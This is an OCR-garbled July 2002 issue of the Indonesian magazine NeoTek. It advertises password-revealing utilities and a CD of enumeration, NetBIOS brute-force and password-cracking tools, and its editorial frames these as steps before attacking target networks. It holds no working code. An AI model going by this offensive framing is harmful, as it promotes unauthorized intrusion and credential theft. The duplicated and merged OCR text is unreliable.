NeoSoft

SnadBoy’s Revelation

upa password lagi? Tapi password itumasih ada dan tampil sebagai deretanasterisk saja. Jangan khawatir. Kini ada

SnadBoy’s Revelation yang akan mengungkapkankembali password anda.

Caranya pun sangat mudah. Instal SnadBoy’sRevelation dari CD NeoTek bulan ini ataudownload dari situs aslinya di:

http://www.snadboy.com/

lalu jalankan sang pengungkap password ini.

Lihat kursor lingkaran+ (circled+ cursor) yangtampak seperti alat bantu membidik itu? Nahkursor istimewa ini dapat anda geret saja dantempatkan di atas tanpa ******* itu dan voila!Apa yang ada di balik ******* itu pundiungkapkan oleh SnadBoy!

Nah!

Mau main rahasia-rahasiaapa lagi sekarang?

LL

Windows 9x mempunyai fasilitasuntuk mengingat password yang

disimpan dalam file dengan ekstensi.pwl. Efek buruknya, kita sering lupa

akan password kita sendiri.Untuk itulah sebenarnya fungsi

SnadBoy’s revelation. Sama jugadengan fungsi pwlviw yang dapat

anda peroleh pada CD NeoTek bulanini juga atau download dari:

http://lastbit.com/vitas/pwlview.aspFungsi pwlview sama dengan

SnadBoy’s Revaltion, namun dengantampilan command line, tampak

kurang ‘heboh’ dibandingkanSnadBoy’s Revelation.

Intip PIntip Password!assword!(lagi)(lagi)

Juni 2002 NeoTek 1

HomePage

NNEOEOTETEKKD

arip

ada

and

a m

en-

Dar

ipad

a an

da

men

- dow

nlo

ad

dow

nlo

ad

......Pendamping Berselancar Salam!Salam!

numerasi anda perlukan sebelum anda, sebagaiseorang ‘hacker,’ melancarkan serangan ke jaringankomputer sasaran anda. Dan untuk mengumpulkan

informasi lewat enumerasi itu anda membutuhkan perangkatutilitas. NeoTek, lewat CD NeoTek, bukan hanya memberikanperangkat tersebut, tetapi juga menyajikan cara penggunaan-nya. Jadi, silakan simak cara menjalani langkah ketiga dalamupaya hacking, setelah foot printing dan scanning, lewat sajianNeoTek kali ini.

Redaksirreeddaakkssii@@nneeootteekk..ccoo..iidd

Menggali informasi lewatMenggali informasi lewatenumerasi sebelumenumerasi sebelum

serangan dimulai.serangan dimulai.

EE

• Legion dapat menembus jaringan komputer yang tidak diproteksi lewat IP Addressdan membuat hard disk komputer sasaran sebagai hard disk pengguna Legion.Penyerang dapat memperlakukan file di hard disk sasaran sebagai filenya sendiri.

NeoTek menyediakan CDyang berisi program-program yang dibahaspada NeoTek nomor ini:

• Legion 2.1• SMBScanner• SolarWinds• Snmputil• OpenUSS 1.2 Final• SDK 1.3.1.02 Windows• Banner Maker Pro• Coffee View 2.5• Blitz 2D• Ulead GIF Animator• Pwlview• ICQ Password Recovery

Dapatkan CD-ROM-nyadalam satu paket denganmajalah NeoTek:

Majalah + CD Rp19.500CD saja Rp15.000

HubungiBagian SirkulasiMajalah NeoTekTel. (021) 548 1457Faks. (021) 532 9041

email:pemasaran@neotek.co.idKontak: Elvi R. Nainggolan

www.neotek.co.id

Bagaimana menghubungi NNEEOOTEK?TEK?KONTRIBUSI ARTIKELredaksi@neotek.co.id

SURAT PEMBACAsupport@neotek.co.id

WEBMASTERwebmaster@neotek.co.id

PEMASARANpemasaran@neotek.co.id

CHATROOM DI DALNET#neoteker

ADMINISTRASI IKLANTel. 021-5481457 Fax. 021-5329041

SIRKULASI NEOTEKTel. 021-3854764

ALAMAT REDAKSIGedung Cahaya Palmerah Suite 506Jl. Palmerah Utara III No. 9Jakarta 11480

MILIS PARA NEOTEKERhttp://groups.yahoo.com/group/majalahneotek

PENAWARAN KHUSUSDapatkan koleksi 8 CD NeoTek

- CD NEOTEK 2-1- CD NEOTEK 2-2- CD NEOTEK 2-3- CD NEOTEK 2-4- CD NEOTEK 2-5- CD NEOTEK 2-6- CD NEOTEK 2-7- CD NEOTEK 2-8

Dengan harga Rp95.000,-

2 NeoTek Juli 2002

Daftar Isi

Daftar IsiDaftar IsiNeoStartNeoStart

NeoTNeoTek Vek Vol. Iol. I I No. 1I No. 100NeoStyleNeoStyle

Arsip Milis NeoTekApa saja yang sudah dibahasdi milis? Gunakan Search!

7 Mengganti Shutdwondan Log OffTip untuk mengganti nama

kedua menu di atas pada menu Startdengan utilitas WinHex, sebuah HexEditor yang cukup andal.

44Mengganti Ikon dllSulit mengganti ikon folderkhusus? Ikuti tip-nya untuk

memperoleh tampilan berbeda.

8

Nguping di IRCMenyadap pembicaraan yangberlangsung di ruang ngobrol

(chat room) IRC dapat dilakukandengan mengirimkan skrip buatananda ke teman ngobrol yang andaingin ketahui isi chat-nya.

12

Forum ala MilisASP memungkinkan andamembuat forum ala milis di

halaman Web anda sehingga fasilitas disitus anda bertambah lengkap.

16

Operator JavaScriptBagian ketiga dari tutorialJavaScript membahas operator

pada JavaScript.

21

psyBNC untuk ChatUntuk melindungi diri anda saatchat dari serangan tertentu,

anda dapat menggunakan psyBNC.

10Membuat Bannerdengan Banner MakerMembuat banner dengan

Banner Maker Pro2 menjadi pekerjaanyang mudah dan menyenangkan.

OpenSource & JavaPeran piranti lunak OpenSource dalam pemebalajaran

bahasa pemrograman Java.

46

23

Membuat GameBuat game sendiri denganmenggunakan program Blitz

Basic. Caranya mudah tanpapemrograman ruwet.

Situs NeoTek www.neotek.co.idneotek.kpone.com.sg

Jadikan situs NeoTek sebagai pangkalan Anda berselancar

Link LangsungKunjungi situs-situs yang dibahas dimajalah NeoTek dengan sekali kliklewat situs NeoTek.

NeoTek versi PDFKehabisan NeoTek di kota Anda?Dapatkan saja versi PDF-nya. Gratis!

DownloadTersedia juga download di situsNeoTek selain dari situs aslinya

Layanan Rupa-rupa NeoTekDapatkan perlengkapan awal dalamberinternet dari situs web NeoTekHumanClickHotline langsung ke redaksi NeoTekuntuk menyampaikan saran dan pesan.Chat RoomKini tidak usah jauh-jauh untuk ngobrollangsung dengan sesama NeoTekerMailing ListIni yang paling ramai. Segera ikutanberbagi pengalaman berinternet!

NeoEduNeoEdu

NeoGameNeoGame48

NeoTNeoTutorutor

Melacak Port NumberLacak port number secara remotedengan menggunakan Ultra-

Scan. Gunakan juga tabel port numberyang jumlahnya mencapai 65.535.

41

Menyusup denganLegionFile sharing pada Windows

(fasilitas NetBIOS) banyak dimanfaatkanorang untuk menyusup masuk komputerorang lain. Salah satu utilitas yang dapatdigunakan untuk menyusup adalahprogram utilitas Legion.

34

Poledit si PelindungPenyelusupan ke komputeranda dapat ditangkis dengan

menggunakan dengan utilitas bernamaPolicy Editor (Poledit).

36

Sebelum MenyerangDalam hacking, sebelum menye-rang anda perlu mengumpulkaninformasi lewat enumerasi.

26

Daftar Isi

NeoSoft

RealProfil

NeoTek Agustus 2002

Intrusion Detection SystemCara mendeteksi serangan yangterhadap suatu jaringan kerja denganmenggunakan Snort.

Terminal DisklessBerdayakan komputer-komputer tuaanda agar secanggih kemampuanserver-nya.

Cara Membuat VirusJangan hanya menerima seranganvirus. Pelajari cara membuat virus(dan juga worm) agar anda dapatmenjaga diri, tentunya!

Snadboy’s Revelation0

Kru NeoTekBermarkas diGedung Cahaya Palmerah 503Jl. Palmerah Utara III No. 9Jakarta 11480Telp. 021-5481457Fax. 021-5329041

BankBank BNIa.n. PT NeoTek Maju MandiriNo. rekening 070.001709720.001

Bank BCA KCP Rawamanguna.n. Aswan BakriNo. rekening 0940544131

Pemimpin UmumFachri Said

Pemimpin RedaksiKosasih Iskandarsjah

Redaktur AhliOnno W. PurboMichael S. Sunggiardi

Pemimpin UsahaFahmi OemarRidwan Fachri

Redaktur PelaksanaGianto WidiantoDadi Pakar

Sekretaris RedaksiElvy Risma Nainggolan

Dewan RedaksiDavid SugiantoStanley

WebmasterSupriyanto

PemasaranHedhi SabaruddinTuti Sundari

Iklan dan PromosiStanleyElvy Risma Nainggolan

KeuanganAswan Bakri

3

6

4

5

Mengendus passwordpada komputer yangtadinya tampil hanyasebagai untai ****.

NmNNeoteker menjawab Neotekerdalam forum milis NeoTek

Ada Apa di CD NeoTek?Eumeration ToolsPassword EavesdroppingSNMP Utilities

Daftar Isi CD NeoTekPWL ViewProgram Dasar

NeoRagam

Inbox

Juli 2002 NeoTek 3

FOKUS BULAN INIFOKUS BULAN INI

Mematangkan Serangandengan Enumerasi

Mematangkan Serangandengan Enumerasi

NeoTNeoTeknoekno

Isi hard disk komputer yang berhasil ditembus alias diintip secara remote denganmenggunakan utilitas Legion v2.1

4 NeoTek Juli 2002

NeoRagam

AdaAda ApaApa didi CCDD NeoTNeoTek?ek?Enumeration tools disajikan pada CD kali ini untuk melengkapi topikutama pada nomor ini. Tak kalahj menariknya adalah PsyBNC yangmembuat kegiatan chatting anda lebih canggih.

CCDD NNeeooTTeekkJJuullii 22000022

numerasi men-dapat perhatiankhusus sebagai

bahasan pada NeoTeknomor ini. Isi CD NeoTekpun mencerminkan bahas-an utama kami. Padagolongan EnumerationTools, anda dapat men-jumpai sejumlah alat ban-tu untuk enumerasi yangbiasa digunakan parahacker untuk mengum-pulkan informasi yangmemadai sebelum me-mulai serangan ke jaring-an kerja komputer yangmenjadi sasarannya. Pro-gram bantu itu misalnyaLegion, SMB Scanner,Snmputil, SolarWinds,serta masih banyak lagi.

Bahasan tentang tweakingternyata mendapat reaksipositif dari para pembaca.Kami kembali menyerta-kan cara mengubah ShutDown dan Log Off padamenu Start dan tidak lupamenyertakan WinHexsebagai Hex Editor untuktujuan ini.

Beberapa program yangsemakin lazim digunakanoleh pemakai komputerseperti DivX codec danDirectX juga kembaliditampilan. Silakanmencobanya!

EE

assword merupakanpiranti security yang

paling luas penggunaannya.Sayang banyak yangkurang berhari-hatimengelola password. Pelba-gai tools pengintai passworddisajikan untuk meningkat-kan kewaspadaan anda.

uSnadboy’s RevelationPassword hanya tampak da-lam bentuk *******? Guna-kan Snadboy’s Revelation un-tuk mengungkapkannya.

uPwlviewWindows menyediakan fasi-litas untuk menyimpan pass-word.Tahukah anda bahwafile ini mudah dibaca?

uPwlhackUtilitas command line untuksemua versi Windows. Men-dukung brute force dan dict-ionary attack.

uICQ Password RecoveryuICQr InformationMen-decrypt user name danpassword dari file .DAT milikICQ user.

uxIntruderMemanfaatkan SMB vulner-ability untuk mendapatkanpassword dari suatu share,baikpada LAN maupun melaluiInternet.

uCain 1.0Password recovery tool ‘ter-baik’untuk Windows 9x.

PPAASSSWSWOORRD D EEAAVVEESSDDRROOPPPPIINNGGPP

u’NT Hacking Kit’NT Resource Kit yang diju-luki hacking kit. Tersediautilitas populer untukNT3.1, 3.5, 3.51, dan 4.0

uNbtscan 1.0.3Mengotomatisasi perintahnbtstat yang powerful un-tuk multiple IP Address.

uLegion v.2.1NetBIOS scanning tool yangcepat dan dilengkapi bruteforce tool untuk mendapatkanakses remote resource shareWindows maupun Samba.

uSharesFinderVersi lain dari NetBIOSscanning tool. Cukup canggihwalau kinerjanya tidak sece-pat Legion.

uNetBIOS Auditing ToolNetBIOS scanner yang ber-jalan pada Windows NT atauLinux. Juga dengan fasilitasbrute force

uSMBScannerNetBIOS scanner yang bu-kan saja menampilkan folderatau disk, melainkan jugaSMB share lain seperti remoteprinter yang dapat anda aksesdari jauh.

uDumpSec (DumpAcl)Salah satu share enumera-tion terbaik untuk WindowsNT. Hanya berjalan padaWindows NT.

uEpdumpMelacak RPC (Remote Pro-cedure Call) endpoint mapperdan menunjukkan servisyang terkait pada IP Addressdan port number-nya.

uNetviewxSerupa dengan epdump dansering digunakan dalam RAS(Remote Access).

uWinfoMengekstrak user account,shares, interdomain, server,dan workstation trust account.

uNbtdumpMelaksanakan null-session,enumerasi share dan useraccount, serta melaporkan-nya dalam format HTML.

uGetMACMenampilkan identitas(MAC Address) dan devicename dari interface cardpada suatu remote machine.

EENNUUMMEERRAATTIIOON TN TOOOOLLSS

SNMP UtilitiesusnmputilTool command line enumer-asi SNMP (Simple NetworkManagement Protocol)

uSolarWindsTool scanning lengkap yangdi antaranya menyediakanfasilitas SNMP browser danMIB scanning.

uSideStepVulnerability scanner yangjuga menyediakan fasilitasSNMP scanning. Dapat dija-lankan dalam metode evade(menghindari pelacakan IDS(Intrusion Detection System).

uTHC Happy BrowserCara mudah melacak serviceapa saja yang disediakanpada suatu situs web.

PWL Viewasilitas pada Windows untuk ‘mengingat’ passwordanda, khususnya pada dial-up networking, memang

nyaman. Anda tidak perlu mengingat-ingat lagi passwordanda. Saking nyamannya anda akhirnya lupa apapassword anda sebelumnya.

Password itu sebenarnya tersimpan dalam suatu filedengan ekstensi .pwl dan dapat anda dapatkan denganmenggunakan fasilitas Find. Setelah diperoleh, maka andatinggal men-decrypt file ini untuk mendapatkan kembalipassword anda.

Salah satu tool untuk mendapatkan kembali passwordyang terlupakan ini adalah pwlview. Cara penggunaannyapun sangat mudah. Begitu dijalankan, apabila memangpassword anda tersimpan sebagai cache pada komputer,maka dengan hanya menekan <Enter> maka password ituakan ditampilkan kembali untuk anda.

Tool ini juga merupakan tool yang paling sering disalah-gunakan untuk mengintip password orang.

Juni 2002 NeoTek 5

NeoRagam

daftar isi cd neotekdaftar isi cd neotekSCRIPTING DAN SERVERASP Edit aspeditJavaScript Editor 2.5 jse2emJS Editor 2.0 jsedit160Personal Web Server setup

OPEN UNIVERSITY SUPPORT SYSTEMOpenUSS 1.2 Final openuss-dev-1-2-finalBusiness Objects Layer jonas-2-4-4Presentation Layer enhydra3.1JRE 1.3.1.02 Windows jre-1_3_1_02-win-iSDK 1.3.1.02 Windows j2sdk-1_3_1_02-winJava Plugin 1.1.3.005 plugin-1_1_3_005-win-i

mIRC SCRIPT DAN BOTmIRC 5.91 mirc591tmIRC 6.0 mirc60mIRC 6.01 mirc601PsyBNC 2.3 psyBNC2.3.tar.gzPutty putty

ENUMERATION TOOLNT 3.1 Resource KitNT 3.5 Resource KitNT 3.51 Resource KitNT 4.0 Resource KitNbtscan 1.0.3 nbtscan1_0_3Legion v.2.1 legionNetBIOS Auditing Tool Win natNetBIOS Auditing Tool Linuxnat10.tar.gzSharesFinder sharesfinderSMBScanner smbscanner-engSnmputil snmputilSolarWinds Engineering Ev. SolarWinds2001-EE-EvalSolarWinds Pro. Eval. SolarWinds2001-PE-EvalSolarWinds ProPlus Eval. SolarWinds2001-PP-EvalSideStep sidestepDumpSec NT dumpaclEpdump epdumpGetMAC getmac_setupNetviewx nvx005Winfo winfoNbtdump nbtdumpEnum NT (Linux) enum.tar.gzNetcat for NT nc11ntNT Admin Toolset aintxScanMAC scanmacTHC Happy Browser thc-hb09Visual MIB Browser EMIBrowser006xSeat Vulnerability Scan xseat2.0UltraScan UScan12Policy Editor SetupPol

TWEAKING TOOLWinHex 9.72 winhexCaroX Io Tools CaroXIOCaroX 2.0 CaroX20CaroX 2000 Bharatayuda CaroXBrt

GAME AND GRAPHICSBanner Maker Pro Trial bmpro4trialBlitz 2D setupUlead GIF Animator Full setupUlead Photo Impact Trial install

PASSWORD EAVESDROPPINGSnadBoy’s Revelation RevelationV2Pwlview pwlviewPwlhack 3.2 pwl_h32.rarPwlhack 4.02 pwl_h402.rarPwlhack 4.10 pwl_h410.rarICQ Password Recovery icqpswICQr Information icqrin15xIntruder xintruderCain 1.0 Demo cain10b

FF

PROGRAM DASARAdobe Acrobat 5.05 rp505enu.exeCoffeeCup Free Viewer Plus CoffeeView25.exeDirectx 8.1 (Win2000) DX81Nteng.exeDirectx 8.1 (Win9x/Me) DX81eng.exeDivX 4.12 Codec DivX412Bundle.exeEnzip 3.00 enzip.exeFTP Explorer ftpx.zipnVidia drivers Win9x_23.11.exenVidia drivers (XP) Win2K-XP_23.11.exeReal Player 8.0 RP8_setup.exeShockwave Player Shockwave_Installer_Full.exeWinamp 2.78 winamp278_full_exeWinZip 8.1 winzip81.exe

Program DasarProgram Dasar

uCoffee Cup Viewer PlusImage viewer yang mudahdigunakan.Versi terakhirdilengkapi fungsi email,ftp, dan zip sehingga andadapat memilih sekelompokgambar dan mengirimkan-nya kepada teman anda.

uDivX4Codec film berformatDivX serta pemutar filemultimedia yang andal.

unVidia DriverDriver grafik untuk cardTNT, TNT2, dan GeForce1, 2 dan 3. Dibuat untukFreeBSD.

uEnzipUtilitas kompresi zip untukMS Windows. Dengan an-tarmuka yang stylish, pro-gram sederhana ini diran-cang untuk dapat langsungbekerja pada Windows Ex-plorer.

6 NeoTek Juni 2002

Inbox

Forum ini dimaksudkan sebagai bentuk offline dari mailing listNeoTek di http://groups.yahoo.com/group/majalahneotek.

NmNNmNNeoTeker menjawab NeoTekerNeoTeker menjawab NeoTeker

Kirim SMST: Posted May 1

Mengirim SMS dari Inter-net, menggunakan www.mtnsms.com, penerimatidak mendeteksi no. hp sipengirim. tapi no. telp. situsybs yg terbaca.

Lalu, saya pertanyaan:Situs mana selainmtnsms.com, dimanaSMS yg diterima sipenerima juga tercatat no.hp si pengirimnya.

Situs mengirim SMSdilengkapi dgn gambardan lagu

Bagaimana mendownload,gambar/image atau lagu,yg bisadimasukkan ke hpkita.

Hamdanhamdan432@plasa.com

J: Posted May 1coba di http://www.1rstwap.com/partners/go.to/gsm-club. Anda harus daftar dulu(free.....)

IGOihiawatta@yahoo.com

J: Posted May 1Buat tambahan bisa jugapake www.sms.ac cepat jugakoq nyampeknya.

Sekarang lg nggak harusdaftar (walaupun daftarnyafree..) soalnya lagi perbaikan(ktnya nambahin feature....).Feature sebelumnya udahlengkap koq. Cuma pengi-riman dibatasi

widwiwid_230779@telkom.net

J: Posted May 2Ada di www.1rstwap.comdimana apapila kita mengi-rim sms maka nomor kitayang akan dilihat oleh

pengirim tanpa embel-embelsangat mudah bisa jugadownload gambar dan lagumenyediakan freesms yangdapat dikirimkan 50 kalidalam 1 minggu

Budiyonokomp1e@yahoo.com

Linux MandrakeT: Posted May 4Saya ada beberapa pertanya-an tentang Linux Mandrake:

1. Saya sekarang pake Win-dows 98,kalo nginstalLinuxnya (free 5.40 Gb)langsung aja, setelah scan-disk ama difrag. Lalu Win-dows-nya kemana? Apatetap di hardisk saya, apahilang setelah nginstalLinux (di tumpuk) ?

2. Gimana dgn software2 danprograms2 lain yg dulusaya install di Windows,apa hilang setelah installLinux Mandrake?

3. Apakah Linux Mandrakeini yg ada di cd NeoTekspecial linux mandrakeORIGINAL? Kalo biasa-nya saya instal windowkan ada kode ato ketikkode registrasinya laolinux mandrake gimana?

4. Siapa sih yg nyiptainlinux, kalo Windows kanMicrosoft ?

5. Apakah semua softwaremicrosoft (windows) bisajalan di Linux Mandrake?

6. Bisa gak saya instal linuxmandrake-nya di hardiskbaru (kosong)? Gimanacaranya?

7. Untuk apa sih boot disket(gunanya)? Terima kasihatas jawabannya.

Andi Suryadi sonar_x4@yahoo.com

J: Posted May 41. Nanti sewaktu instalasi

Mandrake akan ada pilih-an untuk resizing partisiWindows yang ada. Mi-salkan hard disk andamula-mula 10 Gbyte danyang masih free 5,5 Gbyte.Maka dengan fasilitas diMandrake anda bisa ke-cilkan jadi misalnya 7Gbyte. Linux Mandrakenanti akan diinstal di par-tisi yang 3 Gbyte yanganda sisihkan itu. Adabaiknya data-data pentingdi-back up (walaupunbiasanya aman2 saja).

2. Karena partisi Windowstetap ada, semua yang adadi partisi itu tetap utuh.

3. Tidak ada nomor registra-si untuk instalasi LinuxMandrake. Linux bersifatopen source dan free.

4. Linux digagas oleh LinusTorvalds dari Finlandia danbekerja sama dengan Ri-chard Stallman serta pro-grammer seluruh dunia.

5. Software aplikasi padaLinux berbeda denganWindows. Ada softwareyang sama untuk keduasistem operasi itu, misal-nya Netscape, ada jugapadanannya: Gimp setaraPhotoshop, StarOfficesetara MS Office, FreeAmpsetara WinAmp, KDEMedia Player setara Win-dows Media Player, dll.

Plug-in untuk browsingyang lazim di Windowsseperti Quick Time,Shockwave, dll baru dapatberjalan pada Linux apa-bila pada Linux terlebihdulu di-install CrossOverplug-in.Software-software besarpada Windows dapat ber-jalan pada Windows

dengan sebelumnya me-masang pada Linux emu-lator Windows sepertiVMWare atau Wine.

6. Bisa dong. Waktu bootlewat CD ROM Linux,instalasi akan berjalandan anda akan mendapat-kan hard disk anda seagai/dev/hda1 yang masihkosong (empty). Andatinggal alokasikan untukMandrake.Saya sekarang malah darihard disk kosong kadang-kadang mengalokasikanpartisi untuk Windows.Linux bisa mengenalipartisi Windows, tetapisebaliknya tidak bisa!

7. Kalau komputer andamenggunakan mother-board yang baru, makaboot dapat lewat CDROM dan boot diskettetak perlu dibuat. Bilakomputer anda tidak bisaboot dar CD ROM(walaupun ada CD ROMdrive-nya) maka harusbuat boot diskette. Andaboot dar diskette dan baruinstal Linux-nya (tetapambil dari CD ROM)file-file instalasinya.Catatan: Pada NeoTekedisi khusus Mandrakeada salah cetak mengenaicara membuat boot dis-ket. Halaman 5 (langkah3 yang kedua: Copy BotImage). Dikatakan caricdrom.img pada direktori/images. Itu keliru harus-nya cari file cdrom.imgpada direktori /boot.

Kosasih Iskandarsjahkosasih_iskandarsjah@yahoo.com

NeoStart

Juli 2002 NeoTek 7

3 MEMASUKKAN KATA KUNCIPada kotak kosong yang disedia-kan, masukkan kata kunci dariinformasi yang anda perlukan. Laluklik tombol ‘Search Archives.’ Padacontoh ini kami mencari informasimengenai ‘psybnc.’

ernahkah anda suatu saat mengha-dapi permasalahan tertentu dalamber-Internet atau berkomputer dan

memerlukan jawaban atas masalah itu?Milis NeoTek bisa menjadi alternatifsumber informasi yang cukup baik karenamilis ini kini telah mengarsip ribuan tanyajawab, diskusi, dan informasi lain mengenaiInternet dan dunia teknologi informasi.

Untuk mencari informasi di milis ini andadapat menggunakan fasilitas Search yangdisediakan. Seperti halnya jika mengguna-kan fasilitas yang sama pada Searh Engine,anda cukup memasukkan kata kunci dariinformasi yang anda perlukan. SelanjutnyaYahoo!-lah yang akan bekerja untuk anda.

BBIILLA MA MIILILIS TS TEELLAHAHMMEENNJJADADI GI GUUDDANANG ARG ARSSIIPP......

Di milis NeoTek sebenarnya telah terjadi akumulasiinformasi yang jumlahnya mencapai ribuan. Dan itu semuatelah menjadi semacam arsip dengan subjek bahasan yangsuatu saat mungkin perlu anda cari kembali.

P

HASIL PENCARIANSetelah beberapa saat, hasilpencarian muncul di layar. Daninilah hasil pencarian dengan katakunci ‘psybnc.’ Ditemukan 9 pesanpada milis yang membahas ataumengandung kata ‘psybnc.’Pencarian dilakukan atas 7712 arsippesan yang tersimpan di milis.

PENGIRIM & TANGGAL PESANDi sisi kanan daftar pesan andadapat melihat siapa pengirimpesan dan kapan pesan itudikirimkan. Fitur ini bergunauntuk mencek relevansi pesantersebut dengan keperluan andamencari informasi.

MASUK KE SITUS NEOTEKArahkan browser anda ke situsNeoTek di www.neotek.co.id atauneotek.kpone.com.sg. Lalu caridan klik link Mailing List di kolomkiri halaman awal.

JUMLAH ARSIP MILISSetelah mengklik link Maliling List, andaakan diantar ke layar link berikutnyayang jika anda klik akan membawaanda ke halaman milis NeoTek. Daninilah jumlah arsip yang telahtersimpan di NeoTek sampai artikel inidibuat.

1

4 5

2

Mengais informasi di gudang arsip NeoTek

ISI PESANJika anda klik salah satu link padaarsip itu, maka akan pesan ber-sangkutan pun akan ditayangkan dilayar. Dan anda dapat membacainformasi yang terkandung didalamnya.

6

NeoStart

8 NeoTek Juli 2002

rtikel ini mengajakanda “bermain” de-ngan folder khusus,

yaitu folder yang ditandai de-ngan ikon khusus yang ber-beda dengan yang lainnya.Folder ini contohnya adalahMy Computer, My Docu-ments, Recycle Bin, ControlPanel, Printers, dll. Ada seba-gian folder khusus tersebutyang dapat diganti ikon dannamanya dengan mudah,yaitu dengan mengklik kananpada ikon tersebut. Tetapijumlahnya sedikit. Dengantrik ini pembaca dapat me-ngetahui bagaimana meng-ganti gambar ikon, nama, dan

tooltip seluruh folder khusustersebut, termasuk yang tidakdapat dilakukan dengan meng-klik tombol kanan mouse.

Mengganti IkonContoh yang akan digunakandalam hal ini adalah folderMy Computer. Untuk meng-ganti ikon My Computer ini,buka registry Windows de-ngan menggunakan Regeditdan bukalah key berikut:HKEY_Current_User\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticonBila key tersebut belum ada,pembaca dapat membuat key

baru denganmemilihmenu Edit →New → Key.Selanjutnyapada stringvalue “de-fault” yangtelah adaisikan namadirektori danikon favorityang pem-baca miliki.MisalC:\Myicon.ico. Dengandemikian isi string value de-fault adalah “C:\Myicon.ico.”Selanjutnya coba jalankan

Windows Explorer dan andaakan melihat ikon My Com-puter yang telah berubah.Mudah, kan.

FFolder Khususolder KhususMengganti Ikon, Nama & TMengganti Ikon, Nama & Tooltipooltip

Pada Windows 9x, ada beberapa folder yang disebut folder khusus seperti My Computer, My Documents,Recycle Bin. Folder-folder ini tidak mudah diutak-atik oleh pengguna karena fungsinya yang khusus. Happy

Chandraleka mengajak anda ‘bermain-main’ mengubah beberapa properti foloder ini.

A

Nama Ikon Key Registry String Value

My Computer hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon defaultNetwork Neighborhood hkcu\software\classes\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D}\defaulticon defaultRecycle bin default hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon defaultRecycle bin full hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon fullRecycle bin empty hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon emptyMy Documents hkcu\software\classes\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103}\defaulticon defaultInternet Explorer hkcu\software\classes\clsid\{871C5380-42A0-1069-A2EA-08002B30309D}\defaulticon defaultControl Panel hkcu\software\classes\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D}\defaulticon defaultPrinters hkcu\software\classes\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D\defaulticon defaultDial-Up Networking hkcu\software\classes\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48}\defaulticon defaultWeb Folders hkcu\software\classes\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F}\defaulticon defaultScheduled Tasks hkcu\software\classes\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\defaulticon default

Tabel 1. Tabel Key Registry untuk mengganti ikon folder khusus

Keterangan: hkcu = HKEY_Current_User

• Windows Explorer dengan icon dan nama baru untukfolder khusus

NeoStart

Juli 2002 NeoTek 9

Ikon lain dapat diganti de-ngan cara yang sama, hanyasaja anda perlu menyesuai-kan nama ikon yang akandiubah dengan key padaregistry Windows. Pembacadapat mengacu pada Tabel 1di bawah.Dengan mengacu pada Tabel 1tersebut maka anda dapatmengganti ikon pada folderkhusus yang semula tidakmungkin diganti.

Mengganti NamaSama halnya dengan meng-ganti ikon, mengganti namapada folder khusus pun adayang mudah yaitu denganmengklik kanan pada foldertersebut Kemudian pilih me-nu Rename. Tetapi pada seba-gian ikon lain tidak dapat di-lakukan dengan cara tersebut.Artinya hanya dapat dilaku-kan dengan cara di luar kebia-saan yang ada, seperti yangpernah penulis praktikkan.

Contoh merupakan hal yangpaling baik untuk menerang-kan masalah ini. Dalam halini penulis menggunakancontoh folder Recycle Bin,

salah satu folder yang tidakdapat diganti namanya denganmenggunakan cara biasa yai-tu dengan klik kanan padafolder tersebut. Untuk meng-ganti namanya, pembaca per-lu menjalankan Regedit de-ngan memilih menu Start →Run. Dan pada kotak dialogyang ditampilkan ketik “Reg-edit”. Selanjutnya buka keyberikut:

Hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}

Bila key tersebut belum ada,anda perlu membuat keybaru dengan memilih menuEdit → New → Key, dan berinama dengan nama key yangbelum ada. Langkah selanjut-nya pada string value defaultisikan nama yang baru untukRecycle Bin, misal “TempatSampah”. Akhirnya bukaWindows Explorer dan namaRecycle Bin telah berubahmenjadi Tempat Sampah.

Cara yang sama juga berlakuuntuk mengganti nama fol-der khusus lainnya. Tentu sa-ja pembaca perlu memperha-

tikan nama foldernya dengankey registry yang ditunjuk-kan pada Tabel 2.

Dengan menggunakan Tabel 2di atas, pembaca dapat meng-ganti nama folder khusus, cu-kup dengan mengisikan stringvalue default berdasarkan ta-bel tersebut. Folder yang tidakdapat diganti namanya kinidapat diganti.

Mengganti TooltipYang dimaksud dengan tool-tip adalah tulisan yang mun-cul saat pointer mouse ber-henti di atasnya.Tooltip biasa-nya berisi deskripsi dari fol-der bersangkutn atau tip ter-tentu dan isinya ringkas, ti-dak seperti isi file Help padasuatu aplikasi. Berikut akandijelaskan cara menggantitooltip salah satu folderkhusus yaitu My Computer.

Anda perlu menjalankanRegedit dan kemudianmembuka key berikut:

HKEY_Current_User\clsid\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Pada string value InfoTip

terdapat data berupa tulisan“Displays the contents ofyour computer.”. Gantilah tu-lisan tersebut dengan tulisanyang menurut anda menarik.

Untuk melihat hasilnya, mi-nimize-lah semua aplikasidan gerakkan pointer mouseke atas My Computer, makaakan terlihat tooltip yangtelah anda isikan.

Cara yang sama juga dapatditerapkan untuk menggantitooltip pada folder khususlain. Gunakan Tabel 3 berikutini untuk mengetahui keyregistrynya.

Ahirnya penulis ucapkanselamat mencoba dan janganlupa mem-backup registryWindows anda. Bila andamenjumpai permasalahan,silakan menghubungi penulisvia email atau denganbergabung dengan mailinglist paraanakbangsa@yahoo-groups.com atau majalah-neotek@yahoogroups.com,penulis dengan senang hatiberupaya membantu andamenurut kadar kemampuanpenulis. Have some fun!

Nama Ikon Key Registry String Value

